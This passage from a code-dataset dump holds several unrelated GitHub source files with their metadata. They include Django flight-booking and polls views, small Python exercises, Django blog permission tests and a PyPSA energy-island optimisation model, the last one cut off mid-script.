Ticket.objects.get(ticket_id=ticket_id)\n ticket.status = 'CONFIRMED'\n ticket.booking_date = datetime.now()\n ticket.save()\n return render(request,'confirm.html',{\n 'ticket_id': ticket_id\n })\n except Exception as e:\n return HttpResponse(e)\n else:\n return HttpResponse(\"Method must be post.\")\n\n\n#--------------------create E-ticket, ticket in my booking page and save to database----------------------------------------------------\n\ndef createticket(flight_id,departure_date,seat_class,total_amount,username):\n \n if Ticket.objects.count() != 0:\n ticket_id_max = Ticket.objects.aggregate(Max('ticket_id'))['ticket_id__max']\n next_ticket_id = ticket_id_max[0:2] + str(int(ticket_id_max[2:5])+1)\n else:\n next_ticket_id = \"TK100\"\n\n status = False\n if status == True:\n status = 'CONFIRMED'\n else: \n status = 'PENDING'\n\n ticket_id = next_ticket_id\n date = reFormatDateYYYYMMDD(departure_date)\n\n 
print(ticket_id,flight_id,date,seat_class,status)\n ticket = Ticket.objects.create(\n ticket_id=ticket_id,\n flight_id_id=flight_id,\n departure_date=date,\n seat_class=seat_class,\n status=status,\n total_amount=total_amount,\n username =username\n )\n\n ticket.save()\n\n return ticket\n\n#---------------my booking page ---------------\ndef my_booking(request):\n tickets = Ticket.objects.filter(username=request.user.username).order_by('-ticket_id').values('ticket_id','flight_id','departure_date',\n 'seat_class','total_amount','booking_date','status')\n return render(request, 'my_booking.html', {\n 'tickets': tickets,\n })\n\n#----------------------resume pay booking (link to payment's path )--------------------\n\ndef resume_booking(request):\n if request.method == 'POST':\n if request.user.is_authenticated:\n ticket_id = request.POST['ticket_id']\n ticket = Ticket.objects.get(ticket_id=ticket_id)\n if ticket.username == request.user.username:\n return render(request, \"payment.html\", {\n 'total_amount': ticket.total_amount,\n 'ticket_id': ticket.ticket_id\n })\n else:\n return HttpResponse(\"User unauthorised\")\n else:\n return HttpResponseRedirect(reverse(\"login\"))\n else:\n return HttpResponse(\"Method must be post.\")\n\n#------------Cancle ticket and update status of ticket --------------------\n\n@csrf_exempt\ndef cancel_ticket(request):\n if request.method == 'POST':\n if request.user.is_authenticated:\n ticket_id = request.POST['ticket_id']\n try:\n ticket = Ticket.objects.get(ticket_id=ticket_id)\n if ticket.username == request.user.username:\n ticket.status = 'CANCELLED'\n ticket.save()\n return JsonResponse({'success': True})\n # return redirect('/my_booking')\n else:\n return JsonResponse({\n 'success': False,\n 'error': \"User unauthorised\"\n })\n except Exception as e:\n return JsonResponse({\n 'success': False,\n 'error': e\n })\n else:\n return HttpResponse(\"User unauthorised\")\n else:\n return HttpResponse(\"Method must be POST.\")\n\n\n# -----------------this part is used for ticket details ------------------------------------------------\n\nclass TicketPDF(View):\n def get(self, request, pk):\n ticket_id = pk\n\n ticket = list(Ticket.objects.filter(ticket_id=ticket_id).values('ticket_id','flight_id','departure_date','seat_class','status','username','booking_date'))\n passenger = list(Passenger.objects.filter(ticket_id=ticket_id).order_by('id_no').values(\"id_no\",\"ticket_id\",\"first_name\",\"last_name\",\"phone_no\",\"email\"))\n flight_id = ticket[0]['flight_id']\n flight_detail = list(Flight.objects.select_related(\"flight_detail\",\"flight_id\",\"path_id\").filter(flight_id=flight_id).values(\n 'flight_id','airline','path_id__departure','path_id__destination','departure_time',\n 'arrival_time','duration'))\n departure_code = flight_detail[0]['path_id__departure']\n destination_code = flight_detail[0]['path_id__destination']\n departure = list(City_A.objects.filter(city_id=departure_code).values('city_id','city_name','airport'))\n destination = list(City_B.objects.filter(city_id=destination_code).values('city_id','city_name','airport'))\n\n data = dict()\n data['ticket'] = ticket[0]\n data['passenger'] = passenger\n data['flight_detail'] = flight_detail[0]\n data['departure'] = departure[0]\n data['destination'] = destination[0]\n\n # return JsonResponse(data)\n return render(request, 'ticket.html', data)\n\n#--------------Reformat anything----------------\n\ndef reFormatDateMMDDYYYY(ddmmyyyy):\n if (ddmmyyyy == ''):\n return ''\n return ddmmyyyy[8:10] + 
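One bug worth flagging in cancel_ticket above: the except branch passes the exception object itself to JsonResponse, and a bare Exception is not JSON-serializable, so the error path raises instead of responding. A corrected sketch of just that branch:

except Exception as e:
    # str(e) serializes cleanly; the raw exception object does not.
    return JsonResponse({
        'success': False,
        'error': str(e)
    })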
\"/\" + ddmmyyyy[5:7] + \"/\" + ddmmyyyy[:4]\n\ndef reFormatDateYYYYMMDD(yyyymmdd):\n if (yyyymmdd == ''):\n return ''\n return yyyymmdd[6:10] + \"-\" + yyyymmdd[3:5] + \"-\" + yyyymmdd[:2]\n\n\ndef reFormatNumber(str):\n if (str == ''):\n return ''\n return str.replace(\",\", \"\")\n\n\ndef reFormatNumber(str):\n if (str == ''):\n return ''\n return str.replace(\",\", \"\")\n\n\n# ------------------LIST--------------------------\nclass CityList(View):\n def get(self,request):\n cities = list(City.objects.all().values())\n data = dict()\n data['cities'] = cities\n response = JsonResponse(data)\n response[\"Access-Control-Allow-Origin\"] = \"*\"\n return response\n\nclass PathList(View):\n def get(self,request):\n paths = list(Travel.objects.all().values())\n data = dict()\n data['paths'] = paths\n response = JsonResponse(data)\n response[\"Access-Control-Allow-Origin\"] = \"*\"\n return response\n\nclass PathDetail(View):\n def get(self, request, id):\n path = list(Travel.objects.select_related(\"city\").filter(path_id=id).values('path_id','departure__city_name','destination__city_name','departure__airport','destination__airport'))\n path_detail = list(Flight.objects.select_related(\"flight_id\").filter(path_id=id).values('flight_id','airline','departure_time','arrival_time','path_id__departure','path_id__destination','flight_id__seat_class'))\n data = dict()\n data['path'] = path[0]\n data['path_detail'] = path_detail\n\n response = JsonResponse(data)\n response[\"Access-Control-Allow-Origin\"] = \"*\"\n return response\n\n\nclass ClassList(View):\n def get(self, request):\n seat_classes = list(FlightClass.objects.all().values())\n data = dict()\n data['seat_classes'] = seat_classes\n response = JsonResponse(data)\n response[\"Access-Control-Allow-Origin\"] = \"*\"\n return response\n\nclass ClassDetail(View):\n def get(self, request, pk):\n seat_class = get_object_or_404(FlightClass, pk=pk)\n data = dict()\n data['seat_classes'] = model_to_dict(seat_class)\n response = JsonResponse(data)\n response[\"Access-Control-Allow-Origin\"] = \"*\"\n return response\n\n# ----------------------------------------------------------- \n\nclass FlightList(View):\n def get(self, request):\n flights = list(Flight.objects.order_by('flight_id').all().values())\n data = dict()\n data['flights'] = flights\n response = JsonResponse(data)\n response[\"Access-Control-Allow-Origin\"] = \"*\"\n return response\n\nclass FlightDetail(View):\n def get(self, request, id):\n flight = list(Flight.objects.select_related(\"flightclass\",\"travel\").filter(flight_id=id).values('flight_id','airline','departure_time','arrival_time','path_id__departure','path_id__destination','flight_id__seat_class', 'flight_id__price'))\n flight_detail = list(Flight_Detail.objects.select_related(\"flight_id\").filter(flight_id=id).values('flight_id','departure_date','gate_no'))\n data = dict()\n data['flight'] = flight[0]\n data['flight_detail'] = flight_detail\n\n response = JsonResponse(data)\n response[\"Access-Control-Allow-Origin\"] = \"*\"\n return response\n\n\n","repo_name":"NopKorawit/Flight4U_CPE327_CPE231_project","sub_path":"flight_booking/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16921,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"12658115907","text":"from colors import color\n\n\ndef get_int(message):\n while True:\n try:\n n = int(input(message))\n except:\n print(color('Digite um numero interio valido', 'red'))\n else:\n return 
n\n\n\ndef get_programador(programadores):\n while True:\n i = 1\n for p in programadores:\n print(color(f'{i} - {p}', 'green'))\n i += 1\n\n try:\n if len(programadores) > 1:\n n = get_int(color('Escollha um programador: ', 'blue')) - 1\n else:\n n = 0\n p = programadores[n]\n except:\n print(color('Programador não válido! Tente novamente', 'red'))\n else:\n programadores.remove(p)\n return p\n\n\ndef get_linguagem(linguagens):\n while True:\n i = 1\n for l in linguagens:\n print(color(f'{i} - {l}', 'green'))\n i += 1\n\n try:\n if len(linguagens) > 1:\n n = get_int(color('Escollha um programador: ', 'blue')) - 1\n else:\n n = 0\n l = linguagens[n]\n except:\n print(color('Linguagem não válido! Tente novamente', 'red'))\n else:\n linguagens.remove(l)\n return l\n\ndef get_framework_front(framework_front):\n while True:\n i = 1\n for f in framework_front:\n print(color(f'{i} - {f}', 'green'))\n i += 1\n\n try:\n if len(framework_front) > 1:\n n = get_int(color('Escollha um programador: ', 'blue')) - 1\n else:\n n = 0\n f = framework_front[n]\n except:\n print(color('Framework Frontend não válido! Tente novamente', 'red'))\n else:\n framework_front.remove(f)\n return f\n\ndef get_banco_de_dados(banco_de_dados):\n while True:\n i = 1\n for b in banco_de_dados:\n print(color(f'{i} - {b}', 'green'))\n i += 1\n\n try:\n if len(banco_de_dados) > 1:\n n = get_int(color('Escollha um programador: ', 'blue')) - 1\n else:\n n = 0\n b = banco_de_dados[n]\n except:\n print(color('Banco de dados não válido! Tente novamente', 'red'))\n else:\n banco_de_dados.remove(b)\n return b\n\n\ndef valida_dados(vagas):\n for dado in vagas:\n\n if dado['programador'] == 'Nicole' and dado['framework_frontend'] == 'Vue':\n return False\n\n if dado['linguagem'] == 'Java' and dado['banco_de_dados'] != 'PostgreSQL':\n return False\n\n if dado['linguagem'] == 'Angular' and dado['banco_de_dados'] != 'MongoDb':\n return False\n\n if dado['programador'] == 'Mateus' and dado['linguagem'] != 'Python':\n return False\n\n if dado['programador'] == 'Mateus' and dado['banco_de_dados'] == 'MySqlServer':\n return False\n\n if dado['programador'] == 'Tiago' and dado['linguagem'] == 'PHP':\n return False\n\n return True\n\n\n\n\n\n\n\n\n\n","repo_name":"yurihartmann/learning_python","sub_path":"HB_Squads/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":3101,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"42716348072","text":"import numpy as np\nfrom PIL import Image\n\ndef open_gif_image(path):\n img = Image.open(path).convert('RGB')\n\n # get dimensions of image\n dimensions = img.size\n\n # height, width, number of channels in image\n height = dimensions[0]\n width = dimensions[1]\n channels = len(img.getbands())\n\n # Print Information\n print(\"Image Height: {height}; Width: {width}; Channels: {channels}\")\n return np.array(img)\n\nprint(open_gif_image(\"primeira-gif.gif\"))","repo_name":"larissajusten/image-processing","sub_path":"gif-function/gif-function.py","file_name":"gif-function.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"19298722426","text":"\n\ndef MySubmittedSolution(A):\n # write your code in Python 3.6\n N = len(A)\n shadow_table = [False for i in range(N+1)]\n shadow_table[0] = True\n consecutive_on = 0\n ons = 0\n for index in A:\n shadow_table[index] = True\n if shadow_table[index-1] == True and 
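The four get_* pickers in the functions.py record above are identical except for the list they draw from and the error message, so one parameterized chooser covers them all; the sketch below (choose_item is a hypothetical name) reuses the module's own get_int helper and, as in the original, pops the chosen entry so it cannot be picked twice. Separately, the GIF helper in the record above prints "Image Height: {height}; ..." without an f prefix, so the placeholders are printed literally rather than interpolated.

from colors import color  # same helper the module already imports

def choose_item(items, label):
    # Generic form of get_programador/get_linguagem/get_framework_front/
    # get_banco_de_dados: list the options, read a 1-based index, then
    # remove and return the selection. Uses get_int defined above.
    while True:
        for i, item in enumerate(items, start=1):
            print(color(f'{i} - {item}', 'green'))
        try:
            if len(items) > 1:
                n = get_int(color(f'Choose a {label}: ', 'blue')) - 1
            else:
                n = 0
            item = items[n]
        except Exception:
            print(color(f'Invalid {label}! Try again', 'red'))
        else:
            items.remove(item)
            return item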
consecutive_on==index-1:\n ons += 1\n while consecutive_on < N-1 and shadow_table[consecutive_on+1]:\n consecutive_on += 1\n return ons\n\n\ndef solution(A):\n rightMostVal = -1\n count = 0\n N = len(A)\n for i in range(N):\n if A[i] > rightMostVal:\n rightMostVal = A[i]\n if rightMostVal == i+1:\n count += 1\n return count\n\nA = [2,1,3,5,4]\nprint(solution(A))\n\nB = [5,2,3,1,4]\nprint(solution(B))","repo_name":"apoorva9s14/pythonbasics","sub_path":"CompetetiveProblems/CodilityProblems/codilityBulbSwitch.py","file_name":"codilityBulbSwitch.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"25014558159","text":"from django.shortcuts import render, get_object_or_404\n\nfrom django.http import HttpResponse, response, Http404, HttpResponseRedirect\n\n# Create your views here.\nfrom django.template import loader\nfrom django.urls import reverse\n\nfrom polls.models import Question, Choice\n\n\ndef index(request):\n '''\n 首页展示所有问题\n :param request:\n :return:\n '''\n # latest_question_list2 = Question.objects.order_by('-pub_data')[:2]\n latest_question_list = Question.objects.all()\n context = {'latest_question_list': latest_question_list}\n return render(request, 'polls/index.html', context)\n\ndef detail(request, question_id):\n '''\n 查看所有w问题\n :param request:\n :param question_id:\n :return:\n '''\n question = get_object_or_404(Question)\n return render(request, 'polls/detail.html', {'question':question})\n\ndef results(request, question_id):\n '''\n 查看投票结果\n :param request:\n :param question_id:\n :return:\n '''\n question = get_object_or_404(Question, pk=question_id)\n return render(request, 'polls/results.html', {'question':question})\n\ndef vote(request, question_id):\n p = get_object_or_404(Question, pk=question_id)\n try:\n selected_choice = p.choice_set.get(pk=request.POST['choice'])\n except (KeyError, Choice.DoesNotExist):\n # Redisplay the question voting form.\n return render(request, 'polls/detail.html', {\n 'question': p,\n 'error_message': \"你没有做出选择!\",\n })\n else:\n selected_choice.votes += 1\n selected_choice.save()\n return HttpResponseRedirect(reverse('polls:results', args=(p.id,)))","repo_name":"ShaoLay/Vote_DJango","sub_path":"mysite/polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"30675722427","text":"from classes.player import Player\nfrom classes import *\nimport random\n\nclass Game:\n def __init__(self, name):\n self.name = name\n\n def play_game(self, player1, player2):\n player1choice = player1.choice.lower()\n player2choice = player2.choice.lower()\n\n if player1choice == \"rock\" and player2choice == \"scissors\":\n return player1\n elif player1choice == \"scissors\" and player2choice == \"paper\":\n return player1\n elif player1choice == \"paper\" and player2choice == \"rock\":\n return player1\n elif player1choice == \"rock\" and player2choice == \"paper\":\n return player2\n elif player1choice == \"scissors\" and player2choice == \"rock\":\n return player2\n elif player1choice == \"paper\" and player2choice == \"scissors\":\n return player2\n elif player1choice == player2choice:\n return \"Draw\"\n\n def get_computer_choice(self):\n availableChoice = [\"rock\", \"paper\", \"scissors\"]\n return 
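A quick trace of the cleaner solution above on A = [2, 1, 3, 5, 4] shows why the prefix-maximum test counts the fully-lit moments:

# i=0: A[i]=2, rightMostVal=2, 2 != 1  -> bulbs 1..1 not all on
# i=1: A[i]=1, rightMostVal=2, 2 == 2  -> count=1 (bulbs 1..2 lit)
# i=2: A[i]=3, rightMostVal=3, 3 == 3  -> count=2 (bulbs 1..3 lit)
# i=3: A[i]=5, rightMostVal=5, 5 != 4  -> bulb 4 still off
# i=4: A[i]=4, rightMostVal=5, 5 == 5  -> count=3 (all bulbs lit)
#
# A prefix of length i+1 is fully lit exactly when its maximum equals i+1,
# which the O(n)-time, O(1)-space loop checks directly -- unlike
# MySubmittedSolution, no shadow table is needed.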
random.choice(availableChoice)","repo_name":"dephrase/rock_paper_scissors_homework","sub_path":"classes/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"46854716578","text":"from djangae.contrib.gauth.backends import AppEngineUserAPI\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.models import AnonymousUser\nfrom django.db.utils import IntegrityError\nfrom django.http.response import HttpResponse\nfrom django.template import Template, Context\nfrom django.test import TestCase\nfrom django.test.client import RequestFactory\n\nfrom blog.dashboard.decorators import has_permission_level, login_required\nfrom blog.dashboard.models import SiteConfiguration\nfrom blog.utils import ROLE_CHOICES\nfrom google.appengine.api import users\n\n\nclass DecoratorTests(TestCase):\n\n def setUp(self):\n self.factory = RequestFactory()\n self.backend = AppEngineUserAPI()\n\n self.anonymouse_user = AnonymousUser()\n\n self.administrator_user = get_user_model().objects.create(\n username='000000000000000000001',\n email='1@example.com',\n role=ROLE_CHOICES['Administrator']\n )\n self.editor_user = get_user_model().objects.create(\n username='000000000000000000002',\n email='2@example.com',\n role=ROLE_CHOICES['Editor']\n )\n self.author_user = get_user_model().objects.create(\n username='000000000000000000003',\n email='3@example.com',\n role=ROLE_CHOICES['Author']\n )\n self.contributor_user = get_user_model().objects.create(\n username='000000000000000000004',\n email='4@example.com',\n role=ROLE_CHOICES['Contributor']\n )\n self.follower = get_user_model().objects.create(\n username='000000000000000000005',\n email='5@example.com',\n role=ROLE_CHOICES['Follower']\n )\n\n def test_login_required_decorator(self):\n @login_required\n def a_view(request):\n return HttpResponse()\n\n def do_request(user):\n request = self.factory.get('/rand')\n request.user = user\n return a_view(request)\n\n self.assertEqual(do_request(self.anonymouse_user).status_code, 302)\n self.assertEqual(do_request(self.follower).status_code, 200)\n\n def do_request(self, user, required_level):\n @has_permission_level(required_level)\n def a_view(request):\n return HttpResponse()\n\n request = self.factory.get('/rand')\n request.user = user\n return a_view(request)\n\n def test_has_permission_level_decorator(self):\n self.assertEqual(\n self.do_request(self.administrator_user, 'Contributor').status_code, 200)\n self.assertEqual(\n self.do_request(self.editor_user, 'Contributor').status_code, 200)\n self.assertEqual(\n self.do_request(self.author_user, 'Contributor').status_code, 200)\n self.assertEqual(\n self.do_request(self.contributor_user, 'Contributor').status_code, 200)\n self.assertEqual(\n self.do_request(self.follower, 'Contributor').status_code, 302)\n\n self.assertEqual(\n self.do_request(self.administrator_user, 'Author').status_code, 200)\n self.assertEqual(\n self.do_request(self.editor_user, 'Author').status_code, 200)\n self.assertEqual(\n self.do_request(self.author_user, 'Author').status_code, 200)\n self.assertEqual(\n self.do_request(self.contributor_user, 'Author').status_code, 302)\n self.assertEqual(\n self.do_request(self.follower, 'Author').status_code, 302)\n\n self.assertEqual(\n self.do_request(self.administrator_user, 'Editor').status_code, 200)\n self.assertEqual(\n self.do_request(self.editor_user, 'Editor').status_code, 200)\n self.assertEqual(\n 
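The six-way elif chain in play_game above can be collapsed into a lookup table; a minimal equivalent sketch (not the project's code):

BEATS = {'rock': 'scissors', 'scissors': 'paper', 'paper': 'rock'}

def play_game(player1, player2):
    c1, c2 = player1.choice.lower(), player2.choice.lower()
    if c1 == c2:
        return "Draw"
    # player1 wins exactly when player2 chose what player1's choice beats.
    return player1 if BEATS[c1] == c2 else player2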
self.do_request(self.author_user, 'Editor').status_code, 302)\n self.assertEqual(\n self.do_request(self.contributor_user, 'Editor').status_code, 302)\n self.assertEqual(\n self.do_request(self.follower, 'Editor').status_code, 302)\n\n self.assertEqual(\n self.do_request(self.administrator_user, 'Administrator').status_code, 200)\n self.assertEqual(\n self.do_request(self.editor_user, 'Administrator').status_code, 302)\n self.assertEqual(\n self.do_request(self.author_user, 'Administrator').status_code, 302)\n self.assertEqual(\n self.do_request(self.contributor_user, 'Administrator').status_code, 302)\n self.assertEqual(\n self.do_request(self.follower, 'Administrator').status_code, 302)\n\n\nclass SingletonModelTests(TestCase):\n\n def test_autocreate(self):\n self.assertEqual(SiteConfiguration.objects.count(), 0)\n config = SiteConfiguration.get_global()\n self.assertEqual(SiteConfiguration.objects.count(), 1)\n\n def test_singleton(self):\n self.assertEqual(SiteConfiguration.objects.count(), 0)\n config = SiteConfiguration.objects.create(site_name='Blog')\n self.assertEqual(SiteConfiguration.objects.count(), 1)\n with self.assertRaises(IntegrityError):\n config2 = SiteConfiguration.objects.create(site_name='Blog 2')\n self.assertEqual(SiteConfiguration.objects.count(), 1)\n config3 = SiteConfiguration.get_global()\n self.assertEqual(config.pk, config3.pk)\n\n def test_get_global_model_tag(self):\n self.assertEqual(SiteConfiguration.objects.count(), 0)\n site_name = 'Blog'\n SiteConfiguration.objects.create(site_name=site_name)\n out = Template(\n \"{% load global_settings_extras %}\"\n \"{% get_global_model 'dashboard.SiteConfiguration' as site_config %}\"\n \"{{ site_config.site_name }}\"\n ).render(Context())\n self.assertEqual(site_name, out)\n","repo_name":"iago1460/lightweight-django-blog","sub_path":"blog/dashboard/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":5792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"24157744745","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 22 09:29:02 2023\n\n@author: lukas\n\"\"\"\n\nimport os\nimport sys\n# Add modules folder to path\nsys.path.append(os.path.abspath('../../modules')) \n\nimport pypsa\nfrom pypsa.linopt import get_var, linexpr, join_exprs, define_constraints, get_dual, get_con, write_objective, get_sol, define_variables\nimport pandas as pd\n\nimport gorm_v1 as gm\nimport pypsa_diagrams as pdiag\n\nimport matplotlib.pyplot as plt\nimport island_plt as ip\nip.set_plot_options()\n\n#%% ------- CONTROL -----------------------------------\n\n# Main control\nshould_solve = True\nshould_plot = True\nshould_bus_diagram = False\nshould_n_diagram = True\n\n# Main parameters\nyear = 2030 # Choose year\nr = 0.07 # Discount rate\nwind_cap = 3000 # [MW] Installed wind capacity\nn_hrs = 8760 # [hrs] Choose number of hours to simulate\nisland_area = 120_000*0.6 # [m^2] total island area\n\nlink_efficiency = 0.95 # Efficiency of links\nlink_total_max = wind_cap # Total allowed link capacity\nlink_p_nom_min = 0 # Minimum allowed capacity for one link\nlink_limit = float('inf') # [MW] Limit links to countries. 
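The has_permission_level decorator these tests exercise is imported from blog.dashboard.decorators, and its body is not part of this record. Judging only from the assertions (roles at or above the required level get 200, everyone else a 302 redirect), a plausible sketch could look like the following; the comparison direction and the redirect target are assumptions, and ROLE_CHOICES is assumed to map role names to integers that grow with privilege:

from functools import wraps
from django.shortcuts import redirect
from blog.utils import ROLE_CHOICES

def has_permission_level(required_level):
    def decorator(view_func):
        @wraps(view_func)
        def wrapper(request, *args, **kwargs):
            user = request.user
            # More privileged roles are assumed to compare >= lower ones.
            if user.is_authenticated and user.role >= ROLE_CHOICES[required_level]:
                return view_func(request, *args, **kwargs)
            return redirect('/')  # produces the 302s asserted above
        return wrapper
    return decorator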
float('inf')\n\nfilename = \"network_1_\" # Choose filename for export\n\n# Choose which countries to include of this list, comment unwanted out.\nconnected_countries = [\n \"Denmark\", \n \"Norway\", \n \"Germany\", \n \"Netherlands\", \n \"Belgium\", \n \"United Kingdom\"\n ]\n\njiggle = [0, 0]\n\n# Component control\nadd_storage = True # Add storage on island\nadd_data = True # Add datacenter on island\nadd_hydrogen= True # Add hydrogen production on island\nadd_c_gens = True # Add country generators\nadd_c_loads = True # Add country demand\n\n#%% ------- IMPORT DATA -----------------------------------\n\n# ----- Wind capacity factor data ---------\nwind_cf = pd.read_csv(r'data\\wind_formatted.csv',\n index_col = [0], sep=\",\")[:n_hrs]\n\n# ----- Country demand and price ---------\n# Import price and demand for each country for the year, and remove outliers\ncprice, cload = gm.get_load_and_price(year, connected_countries, n_std = 1)\n\n# ----- Dataframe with bus data ---------\n# Get dataframe with bus info, only for the connected countries.\nbus_df = gm.get_bus_df(connected_countries) # Import country data for linking\ncountry_df = bus_df[1:].copy() \n\n# ----- Dataframe with tech data ---------\ntech_df = gm.get_tech_data(year, r)\n\n# ----- Area use data ---------\narea_use = gm.get_area_use()\n\n#%% ------- NETWORK -----------------------------------------------------------\n\n# ----- initialize network ---------\nn = pypsa.Network()\nt = pd.date_range('2030-01-01 00:00', '2030-12-31 23:00', freq = 'H')[:n_hrs]\nn.set_snapshots(t)\n\n# Add data to network for easier access when creating constraints\nn.bus_df = bus_df\nn.area_use = area_use\nn.total_area = island_area \nn.link_total_max = link_total_max\nn.link_p_nom_min = link_p_nom_min\n\n# ----- Add buses-------------------\n# Add multiple buses by passing arrays from bus_df to parameters and using madd\nn.madd('Bus',\n names = bus_df['Bus name'], \n x = bus_df['X'].values,\n y = bus_df['Y'].values,\n )\n\n# ----- Add links--------------------\nfor country in country_df['Bus name']:\n \n # Get link distance in [km]\n distance = gm.get_earth_distance(bus_df.loc['Energy Island']['X'],\n country_df.loc[country]['X'],\n bus_df.loc['Energy Island']['Y'],\n country_df.loc[country]['Y'])\n \n # Add bidirectional link with loss and marginal cost\n gm.add_bi_link(n,\n bus0 = bus_df.loc['Energy Island']['Bus name'], # From Energy island\n bus1 = country, # To country bus\n link_name = \"Island to \" + country, # Link name\n efficiency = link_efficiency,\n capital_cost = tech_df['capital cost']['link'] * distance,\n marginal_cost = tech_df['marginal cost']['link'],\n carrier = 'DC',\n p_nom_extendable = True,\n p_nom_max = link_limit, # [MW]\n p_nom_min = link_p_nom_min,\n bus_shift = jiggle,\n )\n \n# Add list of main links to network to differetniate\nn.main_links = n.links[~n.links.index.str.contains(\"bus\")].index\n\n### COUNTRIES ###\n# ----- Add generators for countries--------------------\n#Add generators to each country bus with varying marginal costs\nif add_c_gens:\n for country in country_df['Bus name']:\n n.add('Generator',\n name = \"Gen \" + country,\n bus = country,\n capital_cost = 0,\n marginal_cost = cprice[country_df.loc[country]['Abbreviation']].values,\n p_nom_extendable = True\n )\n \n# ----- Add loads for countries--------------------\n# Add loads to each country bus\nif add_c_loads:\n for country in country_df['Bus name']:\n n.add('Load',\n name = \"Load \" + country,\n bus = country,\n p_set = 
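gm.get_earth_distance above is given only (x, y) pairs, i.e. longitude/latitude, and its body is not included in this record; under the assumption that it returns a great-circle distance in km, a standard haversine stand-in would be:

from math import radians, sin, cos, asin, sqrt

def haversine_km(x0, x1, y0, y1):
    # x = longitude, y = latitude, matching the call sites above;
    # 6371 km is the usual mean Earth radius.
    lon0, lat0, lon1, lat1 = map(radians, (x0, y0, x1, y1))
    a = sin((lat1 - lat0) / 2) ** 2 \
        + cos(lat0) * cos(lat1) * sin((lon1 - lon0) / 2) ** 2
    return 2 * 6371 * asin(sqrt(a))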
cload[country_df.loc[country]['Abbreviation']].values,\n ) \n\n### ISLAND ###\n# ----- Add wind generator --------------------\nn.add(\"Generator\",\n \"Wind\",\n bus = bus_df.loc['Energy Island']['Bus name'], # Add to island bus\n carrier = \"wind\",\n p_nom_extendable = True,\n p_nom_min = wind_cap, # Ensure that capacity is pre-built\n p_nom_max = wind_cap, # Ensure that capacity is pre-built\n p_max_pu = wind_cf['electricity'].values,\n # capital_cost = tech_df['capital cost']['wind turbine'],\n marginal_cost = tech_df['marginal cost']['wind turbine'],\n )\n\n# ----- Add battery storage --------------------\nif add_storage:\n n.add(\"Store\",\n \"Island_store\",\n bus = bus_df.loc['Energy Island']['Bus name'], # Add to island bus\n carrier = \"Store1\",\n e_nom_extendable = True,\n e_cyclic = True,\n capital_cost = tech_df['capital cost']['storage'],\n marginal_cost = tech_df['marginal cost']['storage']\n )\n\n# ----- Add hydrogen production --------------------\n#Add \"loads\" in the form of negative generators\nif add_hydrogen:\n n.add(\"Generator\",\n \"P2X\",\n bus = bus_df.loc['Energy Island']['Bus name'], # Add to island bus\n carrier = \"P2X\",\n p_nom_extendable = True,\n p_max_pu = 0,\n p_min_pu = -1,\n capital_cost = tech_df['capital cost']['hydrogen'],\n marginal_cost = tech_df['marginal cost']['hydrogen'],\n )\n\n# ----- Add datacenter --------------------\nif add_data:\n n.add(\"Generator\",\n \"Data\",\n bus = bus_df.loc['Energy Island']['Bus name'], # Add to island bus\n carrier = \"Data\",\n p_nom_extendable = True,\n p_max_pu = -0.99,\n p_min_pu = -1,\n capital_cost = tech_df['capital cost']['datacenter'],\n marginal_cost = tech_df['marginal cost']['datacenter'] ,\n )\n\n#%% Extra functionality\ndef area_constraint(n, snapshots):\n \n # Get variables for all generators and store\n vars_gen = get_var(n, 'Generator', 'p_nom')\n vars_store = get_var(n, 'Store', 'e_nom')\n \n # Apply area use on variable and create linear expression \n lhs = linexpr((n.area_use['hydrogen'], vars_gen[\"P2X\"]), \n (n.area_use['data'], vars_gen[\"Data\"]), \n (n.area_use['storage'], vars_store['Island_store']))\n \n # Define area use limit\n rhs = n.total_area #[m^2]\n \n # Define constraint\n define_constraints(n, lhs, '<=', rhs, 'Island', 'Area_Use')\n \ndef link_constraint(n, snapshots):\n # Get main links \n link_names = n.main_links # List of main link names\n link_t = n.link_total_max # Maximum total link capacity\n link_min = n.link_p_nom_min # Minimum link capacity\n link_t_min = link_min * len(link_names) # Minimum total link capacity\n \n # get all link variables, and then get only main link variables\n vars_links = get_var(n, 'Link', 'p_nom')\n vars_links = vars_links[link_names]\n \n # Sum up link capacities of chosen links (lhs), and set limit (rhs)\n rhs = link_t if link_t >= link_t_min else link_t_min\n lhs = join_exprs(linexpr((1, vars_links)))\n \n #Define constraint and name it 'Total constraint'\n define_constraints(n, lhs, '=', rhs, 'Link', 'Total constraint')\n\ndef extra_functionalities(n, snapshots):\n area_constraint(n, snapshots)\n link_constraint(n, snapshots)\n\n#%% Solve\nif should_solve:\n n.lopf(pyomo = False,\n solver_name = 'gurobi',\n keep_shadowprices = True,\n keep_references = True,\n extra_functionality = extra_functionalities,\n )\nelse:\n pass\n \n#%% Plot\n\nip.set_plot_options()\n\nif should_plot:\n ip.plot_geomap(n)\n\nif should_n_diagram:\n \n pos = [\n [0, 0], #Island\n [20, -1], #Denmark\n [15, 8], #Norway\n [18, -10], #DE\n [6, -11], #NE\n [-4, 
